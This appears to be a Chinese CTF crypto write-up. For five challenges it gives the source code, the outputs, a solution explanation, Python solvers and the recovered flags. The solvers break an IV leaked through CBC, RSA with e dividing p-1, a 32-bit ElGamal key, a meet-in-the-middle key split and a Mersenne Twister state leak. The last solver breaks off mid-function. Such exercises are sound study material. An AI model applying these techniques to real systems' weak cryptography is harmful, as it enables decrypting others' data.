crypto
AES_mode
题目:
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import binascii
from Crypto.Util.number import bytes_to_long
from secret import flag
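import os

# The flag body doubles as the CBC initialisation vector.
# NOTE: bytes.strip() removes any leading/trailing bytes drawn from the given
# set, not a literal prefix/suffix, so a flag body that starts or ends with
# one of "f", "l", "a", "g", "{" (or "}") would be shortened here.
iv = flag.strip(b'flag{').strip(b'}')
key = os.urandom(16)

# hint is one random 4-byte word repeated 8 times (32 bytes in total).
hint = os.urandom(4) * 8

# Weakness: the 16-byte key only masks the low half of the 32-byte hint, so
# the high half of the printed integer is the repeating pattern in the clear
# and the mask over the key can be removed.
print(bytes_to_long(hint)^bytes_to_long(key))

msg = b'Welcome to ?CTF! , I hope you can have fun!!!!!!'


def encrypto(message):
    """Encrypt *message* with AES-CBC under the module-level key and iv.

    The message is handed to the cipher as-is (the imported ``pad`` is not
    used), so its length must already be a multiple of 16 bytes.
    """
    aes = AES.new(key,AES.MODE_CBC,iv)
    return aes.encrypt(message)


# Only the final ciphertext block (32 hex digits = 16 bytes) is published.
# Weakness: a CBC IV offers no secrecy against anyone who holds the key and
# the plaintext, because each block can be decrypted and XORed back to the
# previous one. Secrets must never be placed in the IV.
print(binascii.hexlify(encrypto(msg))[-32:])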
'''
91749376808341004327450956291130629671202939702313462998246826182668975563684
b'8f325d5b5c5454680628fa08746d67cf'
'''
`hint` 是 4 字节随机数重复 8 次(共 32 字节),而 `key` 只有 16 字节,所以输出值 `x` 的高 16 字节就是未被遮盖的 `hint`;把 `x` 的高 16 字节与低 16 字节异或即可得到 `key`。用 AES-ECB 解密 C3 得到 `D_k(C3)`,然后 `C2 = D_k(C3) ⊕ P3`;解密 C2 得到 `D_k(C2)`,然后 `C1 = D_k(C2) ⊕ P2`;解密 C1 得到 `D_k(C1)`,然后 `IV = D_k(C1) ⊕ P1`。`IV` 就是 flag。
from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes, bytes_to_long
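import binascii

# Values printed by the challenge: x = hint XOR key (as integers) and the
# final 16-byte ciphertext block in hex.
x = 91749376808341004327450956291130629671202939702313462998246826182668975563684
last_block_hex = '8f325d5b5c5454680628fa08746d67cf'
last_block = binascii.unhexlify(last_block_hex)

# hint is a 4-byte word repeated across 32 bytes and the key covers only the
# low 16 bytes, so the high half of x is the unmasked pattern. XORing the two
# halves cancels the pattern and leaves the key.
x_bytes = x.to_bytes(32, 'big')
high = x_bytes[:16]
low = x_bytes[16:]
# Byte-wise XOR keeps the key at exactly 16 bytes even when its leading byte
# is zero; an integer round-trip would drop leading zero bytes and AES.new
# would reject the short key.
key = bytes(a ^ b for a, b in zip(high, low))

# The challenge encrypts msg without padding: it is exactly three AES blocks.
msg = b'Welcome to ?CTF! , I hope you can have fun!!!!!!'
P1 = msg[0:16]
P2 = msg[16:32]
P3 = msg[32:48]

# ECB decryption gives the raw block-cipher inverse D_k used inside CBC.
cipher = AES.new(key, AES.MODE_ECB)

# CBC: C_i = E_k(P_i XOR C_{i-1}), hence C_{i-1} = D_k(C_i) XOR P_i.
# Walk the chain backwards from the only published block down to the IV.
C3 = last_block
D_C3 = cipher.decrypt(C3)
C2 = bytes(a ^ b for a, b in zip(D_C3, P3))

D_C2 = cipher.decrypt(C2)
C1 = bytes(a ^ b for a, b in zip(D_C2, P2))

D_C1 = cipher.decrypt(C1)
IV = bytes(a ^ b for a, b in zip(D_C1, P1))

flag = b'flag{' + IV + b'}'
print(flag)
"""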
b'flag{CBc_Us3s_Iv!=ECb}'
"""
Common RSA
题目:
from Crypto.Util.number import *
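from secret import flag

assert flag.startswith(b'flag{') and flag.endswith(b'}')

# Two 512-bit primes and the usual public exponent.
# NOTE(review): the write-up that follows reports that e divides both p-1 and
# q-1 for the published instance, which getPrime(512) as written here would
# almost never produce -- presumably the real generator differed; confirm.
p, q = getPrime(512), getPrime(512)
n = p * q
e = 65537
m = bytes_to_long(flag)
c = pow(m, e, n)

# Extra leak: (p + q)^2 reduced modulo n is published next to n.
hint = pow(p + q, 2, n)

print(f'{n = }')
print(f'{e = }')
print(f'{c = }')
print(f'{hint = }')
'''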
n = 131597024257614620869648421307952022599943625170798058722475560465555374754170467986433278540604131619940641178519954230167502146438244308999511105433219427638803460889093328223802388178143540560813587991639442439109510325931982801296494725966519902673302205827914999084293810023067168509012158443748031939483
e = 65537
c = 1968659140793648429069472000786965200510587960406184785982668854732724642287423003255222009970017202179772168410459767605874195614574533370563277818681668876342943583147204497260995173839443989636764614809399895977498001560095317260220383552929292480197409615426208803132661827666690467265686165715909909838
hint = 8041845809205494984282719083536906169105876887210623661715566866580197885950852556859414098121226785749033039450259965513505083753685569890927709072642971188655408152663342066047346862975209503093968807589977151718256296935551857116746970823854584764670720138775077146982697233376686489502015164620786724
'''
n可以在https://factordb.com/进行分解
p = 11516500417019426723367143367023721121114237031914370279724222540748204265234478123246834079895657926608151549574717796604640363281423933511518846958827933
q = 11426824077836755495280357054790333684863938044257704528662235024002507215836880134548286374738252595545758498922210216905258406873430274217501038930995351
这道题正常RSA解密会出现报错
Traceback (most recent call last):d = gmpy2.invert(e,phi)
ZeroDivisionError: invert() no inverse exists
这里的情况是
$\gcd(e, p-1) = \gcd(e, q-1) = e$,也就是说模 $p$ 有 $e$ 个解,模 $q$ 也有 $e$ 个解,总解数为 $e^2$。
分别列出模 p 与模 q 的所有 e 次根(每边 e 个,但枚举 65537 次很快),然后筛选那些数值上很小的代表(因为 flag 明文转成整数通常很小,远小于 p,q)。两边如果出现相同的小整数代表,那就是明文了
exp:
from Crypto.Util.number import inverse, long_to_bytes
import random
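from math import gcd

# Public values printed by the challenge.
n = 131597024257614620869648421307952022599943625170798058722475560465555374754170467986433278540604131619940641178519954230167502146438244308999511105433219427638803460889093328223802388178143540560813587991639442439109510325931982801296494725966519902673302205827914999084293810023067168509012158443748031939483
e = 65537
c = 1968659140793648429069472000786965200510587960406184785982668854732724642287423003255222009970017202179772168410459767605874195614574533370563277818681668876342943583147204497260995173839443989636764614809399895977498001560095317260220383552929292480197409615426208803132661827666690467265686165715909909838

# Factors of n as listed on factordb.com.
p = 11516500417019426723367143367023721121114237031914370279724222540748204265234478123246834079895657926608151549574717796604640363281423933511518846958827933
q = 11426824077836755495280357054790333684863938044257704528662235024002507215836880134548286374738252595545758498922210216905258406873430274217501038930995351


def find_h(mod, t, e, trials=2000):
    """Return a non-trivial e-th root of unity modulo *mod*.

    Random bases g are raised to *t*; a result h is accepted when h != 1 and
    h**e == 1 (mod mod). If no candidate is accepted within *trials* attempts
    the function falls back to pow(2, t, mod) without checking it.
    """
    for _ in range(trials):
        g = random.randrange(2, mod-1)
        h = pow(g, t, mod)
        if h != 1 and pow(h, e, mod) == 1:
            return h
    return pow(2, t, mod)


# The usual d = e^-1 mod phi(n) does not exist for this instance, so the
# script works modulo each prime separately. t is the cofactor (prime-1)//e
# and u inverts e modulo that cofactor.
t_p = (p-1)//e
t_q = (q-1)//e
u_p = inverse(e, t_p)
u_q = inverse(e, t_q)

# One particular e-th root of c modulo each prime.
x_p = pow(c % p, u_p, p)
x_q = pow(c % q, u_q, q)

# Multiplying a root by powers of h walks through the other e-th roots.
h_p = find_h(p, t_p, e)
h_q = find_h(q, t_q, e)

# The plaintext is assumed to be far smaller than p and q, so only roots
# below 2**400 are kept as candidates.
bound = 1 << 400

small_p = {}
for i in range(e):
    v = (x_p * pow(h_p, i, p)) % p
    if v < bound:
        small_p[v] = i

small_q = {}
for i in range(e):
    v = (x_q * pow(h_q, i, q)) % q
    if v < bound:
        small_q[v] = i

# A small integer that is a root modulo both primes is the plaintext.
common = set(small_p.keys()) & set(small_q.keys())

for m_int in common:
    print(long_to_bytes(m_int))
"""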
b'flag{1t_i5_N0T_4_c0mmOn_R5A!}'
"""
baby Elgamal
题目:
from Crypto.Util.number import *
import random
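from secret import flag

p = getPrime(512)
# g is a random residue; nothing here checks its multiplicative order.
g = random.randint(2, p - 2)
# Weakness: the private exponent has only 32 bits, so the discrete log of y
# falls to a square-root search of about 2**16 steps. A private key must be
# drawn from the full exponent range with a CSPRNG (e.g. the secrets module),
# not from the Mersenne Twister behind ``random``.
x = random.getrandbits(32)
y = pow(g, x, p)

print(f'{p = }')
print(f'{g = }')
print(f'{y = }')

# Ephemeral exponent for this single encryption.
k = random.randint(2, p - 2)
m = bytes_to_long(flag)
c1 = pow(g, k, p)
# The message is masked with XOR rather than modular multiplication; either
# way the mask y^k equals c1^x, so it falls as soon as x is known.
c2 = m ^ pow(y, k, p)

print(f'{c1 = }')
print(f'{c2 = }')
'''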
p = 10560464175631160709999383504944939280267067560378620626979040921315467798501630079655340663547895515812021911470304483075907600549587171358369476255124337
g = 5572911063894340974483734192541353411838868965361107134612465011908061780180242348779533324820127053271574799429894984956163372524626786431177292215721384
y = 2551976503972625362405323290468587787679347326045114894085518452627208422960190509410833573983206966744456211220857302778318665690771595372276106771043208
c1 = 1205617983130100879228661072981675725569095797251301660744333997969095366993470887762473783053252549837619991656838026541987751368433948599410216526314464
c2 = 135410793997875487972298785237681131478761447205213610635842285010164308038301697054176371628605014267489864238137735560888444688177201474949707954751577
'''
私钥 x 只用 `getrandbits(32)` 生成,可用有上界的 BSGS 在 $2^{32}$ 范围内秒解离散对数;有了 $x$ 就能算出会话密钥 $s = y^k = (g^k)^x = c_1^x \bmod p$,而题目又用 `c2 = m ^ s`(按位异或),直接还原明文。
from math import ceil, sqrt
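from Crypto.Util.number import long_to_bytes

# Public values printed by the challenge.
p = 10560464175631160709999383504944939280267067560378620626979040921315467798501630079655340663547895515812021911470304483075907600549587171358369476255124337
g = 5572911063894340974483734192541353411838868965361107134612465011908061780180242348779533324820127053271574799429894984956163372524626786431177292215721384
y = 2551976503972625362405323290468587787679347326045114894085518452627208422960190509410833573983206966744456211220857302778318665690771595372276106771043208
c1 = 1205617983130100879228661072981675725569095797251301660744333997969095366993470887762473783053252549837619991656838026541987751368433948599410216526314464
c2 = 135410793997875487972298785237681131478761447205213610635842285010164308038301697054176371628605014267489864238137735560888444688177201474949707954751577


def bsgs_bound(g, y, p, N=2**32):
    """Solve g**x == y (mod p) for 0 <= x < N with baby-step giant-step.

    Returns the exponent, or None when no exponent below N matches. The
    table holds about sqrt(N) entries, which is why a 32-bit private exponent
    offers no protection.
    """
    m = ceil(sqrt(N))

    # Baby steps: remember the smallest j for every value g**j, 0 <= j < m.
    table = {}
    e = 1
    for j in range(m):
        if e not in table:
            table[e] = j
        e = (e * g) % p

    # Giant steps: multiply y by g**(-m) until it lands in the table.
    # The inverse comes from Fermat's little theorem (p is prime).
    inv_g = pow(g, p-2, p)
    factor = pow(inv_g, m, p)
    gamma = y
    for i in range(m + 1):
        if gamma in table:
            x = i * m + table[gamma]
            if x < N:
                return x
        gamma = (gamma * factor) % p
    return None


x = bsgs_bound(g % p, y % p, p)
# Explicit check instead of assert, which is stripped under ``python -O``.
if x is None or pow(g, x, p) != y:
    raise SystemExit("no exponent below 2**32 satisfies g**x == y (mod p)")
print("x =", x)

# Shared mask s = y^k = c1^x; the challenge XORs it onto the message.
s = pow(c1, x, p)
m = c2 ^ s
flag = long_to_bytes(m).decode('utf-8', 'ignore')
print(flag)
"""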
x = 1616680587
flag{31g4m41_D15cr373_10g}
"""
findKey in middle
题目:
from Crypto.Util.Padding import pad
from Crypto.Util.number import *
from random import getrandbits
from Crypto.Cipher import AES
from hashlib import sha256
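from secret import flag


def f(x, y):
    """Return 3**x * 5**y modulo the module-level prime p."""
    return (pow(3, x, p) * pow(5, y, p)) % p


def split_key(key):
    """Split *key* into its residues modulo two fresh 16-bit primes.

    Returns (k1, k2, x, y) with k1 = key % x and k2 = key % y. The assert
    guarantees x * y > key, so the two residues determine key via CRT.
    """
    x, y = getPrime(16), getPrime(16)
    assert x * y > key
    k1, k2 = key % x, key % y
    return k1, k2, x, y


def aes_encrypt(key, flag):
    """Encrypt the PKCS#7-padded *flag* with AES-ECB under *key*."""
    aes = AES.new(key, AES.MODE_ECB)
    return aes.encrypt(pad(flag, 16))


p = 1000000007

# Weakness: the whole secret is a 32-bit integer, which is within exhaustive
# search range on its own; the values published below only speed recovery up.
key = getrandbits(32)
k1, k2, mod1, mod2 = split_key(key)
# x ties both residues together; each residue is below a 16-bit modulus.
x = f(k1, k2)

# The AES key is the first 16 bytes of SHA-256 over the 32-bit integer, so it
# carries no more entropy than that integer.
cipher = aes_encrypt(sha256(long_to_bytes(key)).digest()[:16], flag)

print(f'x = {x}')
print(f'mod = {(mod1, mod2)}')
print(f'cipher = {cipher}')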
# x = 367608838
# mod = (41813, 53149)
# cipher = b'\x98\xfd\xa8\x05R\x17\xb6y%"\t\xb4\xd7\x82\xc4\'\x0b8\x14q\xff.\x13\xfb\xa4D\xb4\xde-\xd5c\xd6M\x13\x90\xdb\x81\xbd\xd0c>A\xbc)\xd0U\x7fW'
- 题目把一个 32 位的 key 拿来“拆分”为两个模 x, y 的余数:
- k1 = key mod x
- k2 = key mod y
- 同时定义了 f(k1, k2) = 3^k1 * 5^k2 (mod p) 并把结果赋给 x(注意这里的 x 是 f(k1,k2) 的值,与模数 mod1、mod2 不同)。
- 给出的 mod1, mod2 实际上就是 x, y(16 位素数),因此 k1 ∈ [0, mod1-1], k2 ∈ [0, mod2-1] 的范围非常小。
- 攻击思路是“两路求和”/“打表对撞”(meet-in-the-middle):
- 构造表:对所有 k1 在 [0, mod1-1],计算 s = 3^k1 (mod p),把 s 映射到 k1。
- 遍历 k2 在 [0, mod2-1],计算 t = x * inv(5^k2) (mod p)。如果 t 出现在表中,则得到 k1, k2 满足 3^k1 * 5^k2 ≡ x (mod p)。
- 一旦得到 k1, k2,就可以用 CRT 把 key 还原出来:
- key ≡ k1 (mod mod1)
- key ≡ k2 (mod mod2)
- 由于 mod1, mod2 是互质的,唯一解在 0 ≤ key < mod1*mod2。
- 该 key 作为 AES 的原始密钥计算方式是 sha256(long_to_bytes(key)).digest()[:16],再用 AES-ECB 对 flag 进行解密并去填充,得到原始 flag。
exp:
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from Crypto.Util.number import long_to_bytes
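from hashlib import sha256


def crt_from_residues(a1, m1, a2, m2):
    """Return the x in [0, m1*m2) with x == a1 (mod m1) and x == a2 (mod m2).

    m1 and m2 must be coprime; pow(..., -1, m2) raises ValueError otherwise.
    """
    M = m1 * m2
    t = ((a2 - a1) % m2) * pow(m1 % m2, -1, m2) % m2
    x = a1 + m1 * t
    return x % M


def solve_flag_from_values(x_value, mod1, mod2, cipher_bytes):
    """Recover the 32-bit key from the published values and print the flag.

    Meet-in-the-middle over 3**k1 * 5**k2 == x_value (mod p): all powers of 3
    are tabulated, then x_value * 5**(-k2) is looked up for every k2. Each
    matching pair is lifted to a key with CRT and tried against the
    ciphertext. Several (k1, k2) pairs can satisfy the congruence, so a
    candidate is discarded when it exceeds 32 bits (the challenge draws the
    key with getrandbits(32)) or when the decrypted padding is invalid.

    Raises:
        SystemExit: if no candidate decrypts to correctly padded plaintext.
    """
    p = 1000000007

    # Table of 3**k1 -> smallest k1 for 0 <= k1 < mod1.
    pow3_map = {}
    cur = 1
    for k1 in range(mod1):
        if cur not in pow3_map:
            pow3_map[cur] = k1
        cur = (cur * 3) % p

    # 5**(-1) via Fermat's little theorem; inv5pow tracks 5**(-k2).
    inv5 = pow(5, p - 2, p)
    inv5pow = 1
    for k2 in range(mod2):
        target = (x_value * inv5pow) % p
        inv5pow = (inv5pow * inv5) % p

        k1 = pow3_map.get(target)
        if k1 is None:
            continue

        key = crt_from_residues(k1, mod1, k2, mod2)
        if key >= 1 << 32:
            # Not a possible getrandbits(32) output: spurious collision.
            continue

        key_bytes = long_to_bytes(key)
        aes_key = sha256(key_bytes).digest()[:16]
        cipher = AES.new(aes_key, AES.MODE_ECB)
        pt_padded = cipher.decrypt(cipher_bytes)
        try:
            flag = unpad(pt_padded, 16)
        except ValueError:
            # Wrong key: the padding does not verify, keep searching.
            continue
        # print(key)  # 1313232941
        print(flag.decode('utf-8', errors='ignore'))
        return

    raise SystemExit("Failed to recover k1,k2 with given inputs.")


if __name__ == "__main__":
    # Replace these values with the actual ones printed by the challenge
    # Example from the prompt:
    x_value = 367608838
    mod1 = 41813
    mod2 = 53149
    cipher_bytes = b'\x98\xfd\xa8\x05R\x17\xb6y%"\t\xb4\xd7\x82\xc4\'\x0b8\x14q\xff.\x13\xfb\xa4D\xb4\xde-\xd5c\xd6M\x13\x90\xdb\x81\xbd\xd0c>A\xbc)\xd0U\x7fW'
    solve_flag_from_values(x_value, mod1, mod2, cipher_bytes)
"""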
flag{e31343dd-4795-4236-bbec-11b8410b5ce6}
"""
strange random
题目:
from Crypto.Util.number import *
import random
from sympy import prime
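def sssstranger(p,q):
    """Return p*q after printing 312 consecutive 32-bit outputs of ``random``.

    Weakness: ``random`` is the Mersenne Twister (MT19937), whose state is 624
    32-bit words. Two calls print 624 consecutive outputs, which is enough to
    reconstruct the state and reproduce every later output.
    """
    n = p*q
    outputs = [random.getrandbits(32) for _ in range(312)]
    print(outputs)
    return n


p=getStrongPrime(512)
q=getStrongPrime(512)
r=getStrongPrime(512)
# n1 and n2 share the prime q, so gcd(n1, n2) discloses it.
n1=sssstranger(p,q)
print(n1)
n2=sssstranger(q,r)
print(n2)
# The exponent is the very next generator output after the 624 printed ones
# and is never printed; it is secret only as long as the generator state is.
e=random.getrandbits(32)
m=bytes_to_long(b"xxx")
# n1*n2//q == p*q*r: a three-prime modulus.
c=pow(m,e,n1*n2//q)
print(c)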
'''
[1728665541, 3263255435, 2691063119, 513420434, 1978667458, 2092691241, 3072561387, 378231450, 3028786976, 840997868, 3471062203, 3920316636, 3916637804, 2376627024, 3173388560, 3539723936, 3614347224, 1379925726, 627801586, 2033110031, 3011670978, 2445060030, 3597825709, 1550315482, 3554680797, 536809681, 2468123914, 2237079688, 2296929082, 509016983, 1311981805, 587441307, 1250231566, 1315700906, 776365185, 2859464782, 3355190319, 1918102563, 211231701, 845506441, 3178972471, 3192228027, 1529640612, 1191656594, 484407364, 2429115020, 1919153985, 4078408440, 202834614, 3117949094, 3476209197, 4079805955, 111463567, 3658322943, 1016273317, 807556240, 3367455806, 2847052298, 2082435398, 1180401345, 3299362819, 4184474116, 2494750167, 4096990231, 1612750035, 770130274, 1733434788, 3092462951, 172910303, 2670474919, 362297276, 2782760415, 2884584980, 2326865163, 720680806, 1281073207, 950149740, 2778388627, 3101343550, 2770433242, 2788026555, 1262935285, 3581320389, 4194538979, 696994625, 821111473, 2806414521, 777650820, 3663930324, 4178227152, 606200040, 2069454582, 2173681644, 2922086151, 2020623409, 3758719473, 1312449069, 2927391874, 4270320113, 3753066345, 1995980698, 4258470255, 1327644070, 3351177965, 298217788, 2620469257, 2989578615, 4055438139, 3942865412, 1622171985, 4273198698, 1243493635, 1396590445, 2402566178, 4029896237, 1025694233, 2314450406, 4170179809, 4024445981, 1994273208, 1861210759, 1803769206, 3689618816, 2927243579, 1922806785, 2486390395, 1862533438, 1121029203, 2031745224, 3841331572, 3769538458, 842401540, 2163702504, 831385340, 376394126, 3974915965, 4034996030, 1854785567, 2555092021, 3046897262, 1094027606, 907771043, 384404822, 3501497369, 216697168, 226807575, 2747644288, 1972752441, 3105815096, 828173042, 3678659380, 764441556, 1130297460, 1402863762, 3970725436, 3086776368, 344855794, 2088029785, 503832722, 1968203466, 279790788, 3883395066, 4037131559, 1964635994, 1743508595, 3532171326, 1818297125, 2848875183, 1136249744, 
4272443113, 1788562924, 3711074145, 418022453, 4283864580, 1386827219, 2059781647, 449497651, 469589888, 3588436437, 351986216, 3443966898, 2319253729, 1266070779, 1630403341, 1846437281, 3603091148, 447407528, 1442665148, 928268668, 2054879461, 774139131, 2430644896, 3555838468, 2030660868, 3319238578, 1015731571, 3478144019, 2453174776, 1941944791, 2053565326, 4110536281, 2526460393, 2824479032, 3301735760, 780255490, 1603208589, 1692469907, 3130130497, 3584634807, 3928107012, 509990258, 1869589899, 1905903514, 2952291895, 1729434633, 2044093816, 970234210, 1567208463, 2796641501, 1745350460, 3822138868, 2103785872, 391350339, 4191592334, 137687673, 4006137512, 1593615631, 1861899739, 3651189911, 520633354, 1966539346, 169641067, 1406362177, 737946704, 784276247, 2058995198, 3549499398, 1558398384, 3675852813, 1429069728, 2298431975, 2898233687, 286239555, 392193984, 3086032521, 3126507866, 34675686, 2287440422, 2548373557, 836659862, 99648826, 1083241258, 3636664381, 3251127672, 3516486155, 3869736806, 3646281836, 1700118982, 2156956, 1800018184, 777416396, 322014799, 3243611333, 1128026911, 4092136383, 2745524281, 751830889, 4158398986, 2017168515, 4209181862, 1454303529, 4210187982, 2987136052, 118405085, 2154307567, 2706958148, 783722604, 3630718307, 2946126077, 3769533841, 1952446395, 2864470266, 2438635144, 109801110, 2106815318, 1964646247, 2230611498, 3926379899, 2415862583, 2403244187, 1558995124, 755524922, 3392617372, 3025516874, 4190475123, 2949921629, 501571073, 4156590328, 4269504697, 2949638988, 1468559288, 3213839184, 2489556309, 3740310282, 2197691296, 2398027688, 3828617697, 1569783402, 2795666101, 176638489, 2911249476, 4241926468]
138851415190713465480971174257448869324235475491224608863667367765557787130928841140544464901159451427142751973587286540048280289357977393428301017662916668537581389547284678037051116847831257571725930334961572331109949981542324563168168819931774176415705884732805196594752559820155791993081799451192512108559
[942815517, 2520455710, 1891728341, 2453497085, 3941880462, 2392891255, 2747143494, 4243618507, 1517358347, 450211540, 2842693883, 1221103042, 1422891239, 4030144964, 2685521942, 1947290728, 3302832218, 1782499203, 3868364088, 308582506, 4251094005, 4980868, 2451326086, 3651628499, 2281074832, 480798516, 758959082, 3615264118, 1219594762, 1098658489, 2470901076, 1893356372, 3318772649, 1863044573, 3548017752, 3763808736, 1654584736, 3003555639, 1256437939, 3270885177, 258743642, 1299719645, 2208182535, 373707415, 1911873380, 92306350, 1545073247, 3827312104, 3255398601, 3192552708, 3206214673, 420879235, 1364502459, 3758282150, 2525185637, 1668948490, 1540972099, 4226808177, 2383393173, 3749471576, 1454575032, 3539841865, 690099204, 3429693556, 3143045768, 1019783847, 4254140560, 3362875271, 4286952044, 3651977835, 3979297548, 3354687702, 732498631, 830001339, 1600709940, 256242259, 3433896402, 717208932, 1143942721, 1387817800, 4149665963, 4136218742, 1148960729, 3448152230, 88647458, 1774354757, 3157382396, 2749420283, 3384884111, 4052749938, 3562466643, 388123649, 1019572873, 9288731, 2722126277, 2203755362, 2808094116, 318555465, 4238001430, 1279580330, 2688604848, 1360319839, 2479873580, 1061154987, 2958583972, 479553026, 1527664208, 1632893535, 3787166229, 989207338, 1663447933, 3712938090, 4198966560, 2566654848, 3696114905, 3012771350, 3607688877, 913491574, 3931397722, 3009342175, 2443448349, 1062996946, 2981037281, 26940862, 949228546, 4200949390, 4183590581, 1149500333, 2868274151, 1076013183, 2931224950, 1231187554, 1432454474, 462283109, 2459428825, 2313869884, 3779120205, 671163379, 283074107, 4292451272, 2073686644, 2106538278, 795977087, 1521261558, 2211934761, 3442006668, 810921154, 657699377, 2190946289, 3774455606, 95125385, 2480329023, 3476089304, 1238475919, 1076726394, 2120212816, 912904401, 3115487553, 4166801889, 2671842223, 3233061625, 2792720396, 164231023, 2899715615, 1080603752, 1871958768, 3205958631, 1429172605, 102859110, 1233358091, 
4121045015, 3707468958, 2054107845, 3086180315, 3618494768, 151289595, 2395511379, 2202211183, 3317167416, 924499924, 1123843927, 1845597735, 2551305188, 281765988, 2688253086, 1560780497, 2061169891, 573571184, 2525386268, 1825854571, 2899785981, 3266712321, 3610412586, 411137454, 3935324159, 2494782798, 3373400635, 909758036, 730762387, 821217945, 1637755246, 914390627, 364271532, 3570237156, 739531656, 3535813993, 3136577043, 269001524, 330161113, 1582587768, 4276579985, 650173619, 2350573855, 1233199180, 824190362, 2132064523, 1630599868, 3890164143, 3281849000, 443369842, 556256551, 3665988107, 168059217, 2459533678, 2959581748, 1266795043, 2541445057, 3690162432, 4033239960, 2747349823, 2527544983, 3483114688, 1912665005, 2589639629, 967006093, 3043481320, 1577789923, 888032317, 3135015646, 1807362947, 3974720459, 1028251582, 1395973950, 141248013, 3415448254, 2585771855, 1652904856, 2483847688, 1241390535, 2966558718, 80133169, 544591052, 117065220, 1259833545, 4287364552, 3172964645, 1378147180, 1961149024, 2557044426, 3079500155, 1278712539, 2437075468, 4079403208, 1424357113, 1460980393, 1869711134, 739995379, 236457792, 56725573, 1192143182, 3480051881, 1940191085, 2145576244, 277256288, 1350391298, 927908951, 234611527, 1270659504, 2800736156, 2377033778, 379042674, 268642839, 254414386, 3717739293, 3742427571, 2062173352, 1468838866, 3248800238, 3810334297, 1774562996, 3243508531, 768385892, 3663776790, 3561471474, 2072506584, 4072612194, 4145385651, 1568151342, 413061947, 2606711318, 787242867, 358259431, 3250866366, 496471679, 3974003161, 3962245443, 3448346690, 3918858426, 1545049592, 4098252582, 4272944055, 2709981394]
114667370859267713459979739172691665204879151133165169917752071845350748196947769536460950730177555853607685665148468694999487984430241339705779225600425842398781387739352517522092529671186262329583850232443458354943390042125768975735770226662059908491110663467968924345474794260851510527271024718213859872091
254437839234710932548963084800696912447199841209292016504026652383142017227876963989808065988983617626350151358444895183944611290313513729505521630711812174923796964838915751672967332321515720258149777206328112312514688748335753179198631177743199829645308091442800427146012476434191025450662950787631144984158609948536064605299987908223963902731920237033619141863042816600729594847568654431928343565350409273886054122366132475796004834811862120850908513978375240
'''
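- 先把指数 $e$ 拆成「与 $p-1$ 互素的部分」和「只含 $p-1$ 中素因子的部分」:
$e = e_{\text{coprime}} \cdot e_{\text{in}}$,其中 $e_{\text{coprime}}$ 不含任何整除 $p-1$ 的素因子。
- 先把密文降幂:$y \equiv c^{\,e_{\text{coprime}}^{-1} \bmod (p-1)} \equiv m^{e_{\text{in}}} \pmod{p}$
- 然后只对 $e_{\text{in}}$ 做开根:
- 对 2 的幂:Tonelli–Shanks 连续开平方(开多少次就按 $e$ 里 2 的指数来开,不需要看 $p-1$ 的 2 阶)。
- 对奇素数 $\ell$:做一次“$\ell$-次根”:令 $u_\ell \equiv \ell^{-1} \pmod{(p-1)/\ell}$,取 $y^{u_\ell}$ 即得一支根。
- 合并到三素数再用 CRT;最后枚举核 $|\ker(x \mapsto x^e)| = \gcd(e, p-1)\cdot\gcd(e, q-1)\cdot\gcd(e, r-1)$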
exp:
from math import gcd
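import random


def long_to_bytes(n: int) -> bytes:
    """Return the minimal big-endian encoding of *n* (b"\\x00" for zero)."""
    if n == 0:
        return b"\x00"
    return n.to_bytes((n.bit_length()+7)//8, 'big')


def v_p(n, p):
    """Return the exponent of the prime *p* in *n* (n must be non-zero)."""
    t = 0
    while n % p == 0:
        n //= p
        t += 1
    return t


def legendre(a, p):
    """Return a**((p-1)/2) mod p: 1 for a residue, p-1 for a non-residue."""
    return pow(a, (p-1)//2, p)


def tonelli(n, p):
    """Return both square roots (r, -r mod p) of *n* modulo the odd prime *p*.

    Returns (0, 0) when p divides n. The function does not check that n is a
    quadratic residue; callers are expected to pass one.
    """
    if n % p == 0:
        return 0, 0
    if p % 4 == 3:
        # Direct formula for p == 3 (mod 4).
        r = pow(n, (p+1)//4, p)
        return r, (-r) % p

    # Write p - 1 = q * 2**s with q odd.
    q = p - 1
    s = 0
    while q % 2 == 0:
        q //= 2
        s += 1

    # Smallest quadratic non-residue z.
    z = 2
    while legendre(z, p) != p-1:
        z += 1

    c = pow(z, q, p)
    t = pow(n, q, p)
    r = pow(n, (q+1)//2, p)
    while t % p != 1:
        # Find the least i with t**(2**i) == 1.
        i = 1
        t2 = pow(t, 2, p)
        while t2 % p != 1:
            t2 = pow(t2, 2, p)
            i += 1
        b = pow(c, 1 << (s - i - 1), p)
        s = i
        c = pow(b, 2, p)
        t = (t * c) % p
        r = (r * b) % p
    return r, (-r) % p


def crt_pair(a1, m1, a2, m2):
    """Combine x == a1 (mod m1) and x == a2 (mod m2).

    Returns (x, lcm(m1, m2)). The residues are assumed to be compatible when
    the moduli share a factor.
    """
    g = gcd(m1, m2)
    t = ((a2 - a1)//g) * pow(m1//g, -1, m2//g) % (m2//g)
    x = a1 + t*m1
    return x % (m1*(m2//g)), m1*(m2//g)


def crt_all(res, mods):
    """Fold crt_pair over parallel lists of residues and moduli."""
    x, m = res[0], mods[0]
    for a, mod in zip(res[1:], mods[1:]):
        x, m = crt_pair(x, m, a, mod)
    return x % m, m


def factors_small(n):
    """Factor *n* by trial division; returns {prime: exponent}."""
    f = {}
    d = 2
    x = n
    while d*d <= x:
        while x % d == 0:
            f[d] = f.get(d, 0) + 1
            x //= d
        # After 2, only odd trial divisors are needed.
        d += 1 if d == 2 else 2
    if x > 1:
        f[x] = f.get(x, 0) + 1
    return f


def generator_of_exact_order(p, d):
    """Return an element of multiplicative order exactly *d* modulo *p*.

    Tries up to 800 random bases; raises RuntimeError if none qualifies.
    Expects d to divide p - 1.
    """
    if d == 1:
        return 1
    primes = list(factors_small(d).keys())
    for _ in range(800):
        a = random.randrange(2, p-1)
        g = pow(a, (p-1)//d, p)
        if g == 1:
            continue
        # Order is exactly d iff g**(d/t) != 1 for every prime t dividing d.
        if all(pow(g, d//t, p) != 1 for t in primes):
            return g
    raise RuntimeError("找核生成元失败,重跑即可")


# MT19937 state size and twist offset, used by twist().
N, M = 624, 397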
# Constants consumed by twist(): MATRIX_A is XORed in when the combined word
# is odd, UPPER_MASK keeps the top bit of one state word and LOWER_MASK the
# low 31 bits of the next.
MATRIX_A = 0x9908B0DF
UPPER_MASK = 0x80000000
LOWER_MASK = 0x7fffffff
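def _urx(y, s):
    """Invert ``x ^= x >> s`` on a 32-bit word.

    Each fixed-point round recovers another s high bits; five rounds cover
    all 32 bits for the shifts used here (18 and 11).
    """
    x = 0
    for _ in range(5):
        x = y ^ (x >> s)
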